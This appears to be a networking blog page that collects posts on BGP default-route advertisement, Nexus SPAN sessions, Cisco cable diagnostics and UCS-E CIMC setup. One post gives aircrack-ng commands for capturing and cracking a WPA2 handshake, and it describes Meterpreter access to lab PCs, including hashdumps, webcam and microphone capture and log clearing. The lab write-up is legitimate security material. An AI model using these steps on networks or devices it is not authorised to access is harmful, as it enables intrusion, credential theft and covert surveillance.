Advertising a default route in BGP

There are four ways to distribute a default route in BGP.

Three of them (network 0.0.0.0, default-information originate, and redistribution from another routing protocol) are similar in their resulting effect: they inject the default route into the BGP RIB, from where it is advertised to all BGP neighbors. The difference is in the origin of the default route that is injected into BGP. Specifically:

  • network 0.0.0.0 will inject the default route into BGP only if the default route is currently present in the routing table.
  • redistribution will inject the default route into BGP only if the default route is currently present in the routing table and if it has been learned by a specific source protocol we are redistributing from.
  • default-information originate causes the default route to be artificially generated and injected into the BGP RIB, regardless of whether it is present in the routing table. The newly injected default will be advertised to all BGP peers (because it now resides in the BGP RIB).

The fourth method:

  • neighbor X.X.X.X default-originate is similar to default-information originate in that the default route is “artificially generated” (it does not need to be present in the routing table for the advertisement to take effect)*.
  • However, neighbor X.X.X.X default-originate differs from default-information originate in that the default route is advertised only to that specific BGP neighbor, not to all existing BGP neighbors as with the previous approaches. The default route is not installed in the BGP RIB of the router configured with the neighbor X.X.X.X default-originate command, so it is not generally advertised to all BGP neighbors.

*By doing the ‘default-originate’, you request RouterA (provider A) to send the route 0.0.0.0/0 via BGP out to RouterB (customer B). This is useful in many cases where customer B doesn’t really want to accept a full BGP feed (for example in stub autonomous systems).
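The four methods side by side, as an added Cisco IOS configuration example that is not part of the original post. AS numbers, neighbor addresses, prefix-list and route-map names are constructed placeholders. Method 2 carries the filter a practitioner would want, so that redistributing the source protocol injects only the default and does not leak every static route into BGP; method 4 shows the optional route-map that makes the per-neighbor default conditional on another route being present in the RIB.

```cisco
! Added example, not from the original post. Addresses, AS numbers and
! names are constructed placeholders.
!
! 1) network 0.0.0.0 -- enters the BGP RIB only while 0.0.0.0/0 is in the
!    routing table (here supplied by a static route)
ip route 0.0.0.0 0.0.0.0 198.51.100.1
router bgp 65001
 network 0.0.0.0
!
! 2) redistribution -- only the default learned from the named source
!    protocol (static) is injected; the route-map stops other statics
!    from leaking into BGP along with it
ip prefix-list DEFAULT-ONLY seq 5 permit 0.0.0.0/0
route-map STATIC-DEFAULT permit 10
 match ip address prefix-list DEFAULT-ONLY
router bgp 65001
 redistribute static route-map STATIC-DEFAULT
!
! 3) default-information originate -- default generated into the BGP RIB
!    and therefore advertised to every neighbor
router bgp 65001
 default-information originate
!
! 4) neighbor default-originate -- sent to this one peer only and never
!    installed in the local BGP RIB; the route-map makes it conditional
!    on the upstream's address (placeholder) being present in the RIB
ip prefix-list UPSTREAM-ALIVE seq 5 permit 203.0.113.1/32
route-map ONLY-IF-UPSTREAM permit 10
 match ip address prefix-list UPSTREAM-ALIVE
router bgp 65001
 neighbor 192.0.2.2 remote-as 65002
 neighbor 192.0.2.2 default-originate route-map ONLY-IF-UPSTREAM
```

To confirm the behaviour described above, `show ip bgp 0.0.0.0` shows whether the default is in the local BGP RIB (it should be for methods 1 to 3 and absent for method 4), and `show ip bgp neighbors 192.0.2.2 advertised-routes` shows what a given peer is actually being sent.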

Building a SPS Solution

Using MangoES with 3G/4G integrated corporate connectivity for management & monitoring. 👌🏼

Security insight: Cracking WPA2 and fun with Meterpreter

So my wife wasn’t well for most of the weekend and the kids are busy doing their stuff. So I got some time to play around 🙂 on my home lab, so here’s the thing:

It took me less than 5 mins to obtain a WPA2 handshake and less than 5 seconds to brute force the *.cap file that contained the password post-handshake, and obviously it’s only as good as your word list.
Key commands are:

airmon-ng
airmon-ng start [interface]
airodump-ng [monitor interface]
airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
aireplay-ng -0 2 -a [router bssid] -c [client bssid] [monitor interface]
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap

Further to that, and in about as much time as it took me to read up on Meterpreter (with recognition to Offensive Security), I was able to access a couple of Windows PCs on my test network. Not only was I able to access the target machines, I obtained a hashdump, took a screenshot, took remote control, opened a shell/cmd, downloaded a file and, probably the most impressive and most worrying, was able to run the remote webcam, taking a snap and a continuous stream, along with audio recording from the microphone on those target machines. :/ Oh… and I cleared the logs as I left the scene, all within a couple of hours.

So keep those systems secure and up to date peeps!

Creating a SPAN session on a Nexus 9K

Create SPAN session
=================================
9kswitch# conf t
9kswitch(config)# monitor session 1

Configure destination port (destination cannot be a FEX port or a Port-channel!)
=================================
9kswitch# conf t
9kswitch(config)# interface eth 1/15
9kswitch(config-if)# switchport monitor
9kswitch(config-if)# exit
9kswitch(config)# monitor session 1
9kswitch(config-monitor)# destination interface eth 1/15

Configure source port (or VLAN)
=================================
9kswitch(config-monitor)# source interface eth 1/10
9kswitch(config-monitor)# source interface eth 1/11
or
9kswitch(config-monitor)# source vlan x

Activate a SPAN session
==================================
9kswitch(config)# no monitor session 1 shut

Display SPAN session
==================================
9kswitch# show monitor
or
9kswitch# show monitor session 1

conf t
monitor session 1
exit
int eth 1/15
switchport monitor
exit
monitor session 1
destination int eth 1/15
source int eth 1/10
source int eth 1/11
exit
no monitor session 1 shut

Cisco Nexus 9000: Configuring SPAN

Cisco 3850 – Power Diagnostics

Some handy commands for testing an interface’s power:

3850Switch# test cable-diagnostics tdr interface gigabitEthernet 1/0/1

...wait a few seconds...

3850Switch# sh cable-diagnostics tdr interface gigabitEthernet 1/0/1

Results should read Normal, not Open.

UCS-E160D-M2 Configuration

Basically there are two options that I like to use when connecting to Cisco’s Integrated Management Console (CIMC). The first is via the router, using an address within the allocated subnet; with this method you must add a host-specific route pointing at the ucse4/0 interface to provide access to the UCS-E module.

interface ucse4/0
description UCS-E Series CIMC Link
no ip unnumbered GigabitEthernet0/0
imc ip address 172.22.39.70 255.255.255.248 default-gateway 172.22.39.65
imc access-port shared-lom
!
ip route 172.22.39.70 255.255.255.255 ucse4/0

Alternatively, to manage the CIMC from your Data-vLAN, add the below device configuration and use the dedicated console mode to provide access to the CIMC alone. Ensure you put the console into the correct vLAN for management; in this case I’ll be using vLAN-901.

interface ucse4/0
description UCS-E Series CIMC Link
no ip unnumbered GigabitEthernet0/0
imc ip address 172.22.36.2 255.255.255.0 default-gateway 172.22.36.1
imc access-port dedicated console
end
!
To support a VMware configuration you will need to use two GigabitEthernet ports for redundancy/fail-over. These are GE2 & GE3 (GE1 is used for the console). The two ports should be added to the Data-vLAN and NIC-teamed using VMware.

Summary of ports:

GigabitEthernet1/0/11 >> GE2
GigabitEthernet1/0/12 >> GE3
GigabitEthernet1/0/13 >> GE1 (Console Port)